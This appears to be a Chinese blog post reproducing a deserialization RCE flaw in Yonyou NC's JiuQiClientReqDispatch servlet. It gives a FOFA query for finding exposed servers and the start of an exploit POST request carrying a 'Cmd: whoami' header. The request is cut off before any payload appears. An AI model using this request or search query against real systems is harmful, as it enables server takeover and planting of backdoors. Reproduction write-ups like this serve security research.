当前位置: 首页 > news >正文

用友NC JiuQiClientReqDispatch反序列化RCE漏洞复现

news 2025/8/12 7:41:20

0x01 产品简介

 用友NC是一款企业级ERP软件。作为一种信息化管理工具,用友NC提供了一系列业务管理模块,包括财务会计、采购管理、销售管理、物料管理、生产计划和人力资源管理等,帮助企业实现数字化转型和高效管理。

0x02 漏洞概述

  用友 NC JiuQiClientReqDispatch 接口存在反序列化代码执行漏洞,攻击者可通过该漏洞在服务器端任意执行代码,写入后门,获取服务器权限,进而控制整个web服务器。

0x03 复现环境

FOFA:app="用友-UFIDA-NC"

4b4ae218e3ea4146b47d31168a7af2a9.png

0x04 漏洞复现 

Exp

POST /servlet/~ic/com.ufsoft.iufo.jiuqi.JiuQiClientReqDispatch HTTP/1.1
Host: your-ip
Cmd: whoami
Accept-Encoding: gzip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML
http://www.lryc.cn/news/253436.html

相关文章:

  • Linux:docker镜像的创建(5)
  • 数据结构与算法-D2D3线性表之顺序表
  • 01_W5500简介
  • 异常 Exception 练习题 (未完成)
  • Linux系统编程:并发与信号总结
  • Jmeter 接口-加密信息发送(一百九十九)
  • 微信小程序nodejs+vue+uniapp视力保养眼镜店连锁预约系统
  • 掌握Vue侦听器(watch)的应用
  • SAP-PP:PP顾问管理系统的相关建议
  • Unity资源路径与读取
  • “大+小模型”赋能油气行业高质量发展
  • 【win32_004】字符串处理函数
  • 如果不小心修改了按钮的名字并且忘记了原名字
  • opencv阈值处理
  • html之JS
  • SQL Server的安装和首个库的创建
  • STM32下载程序的五种方法
  • 基于springboot + vue大学生竞赛管理系统
  • 【详解】Spark数据倾斜问题由基础到深入详解-完美理解-费元星
  • xss漏洞后端进行html消毒
  • [论文精读]利用大语言模型对扩散模型进行自我修正
  • CTF特训日记day(4-6)
  • 【深度学习笔记】09 权重衰减
  • 三大兼容 | 人大金仓兼容+优化MySQL用户变量特性
  • Git介绍与安装使用
  • 理解DuLinkList L中的“”引用符号
  • 前端并发多个请求并失败重发
  • 【Qt开发流程】之对象模型2:属性系统
  • PHP之curl详细讲解
  • R语言30分钟上手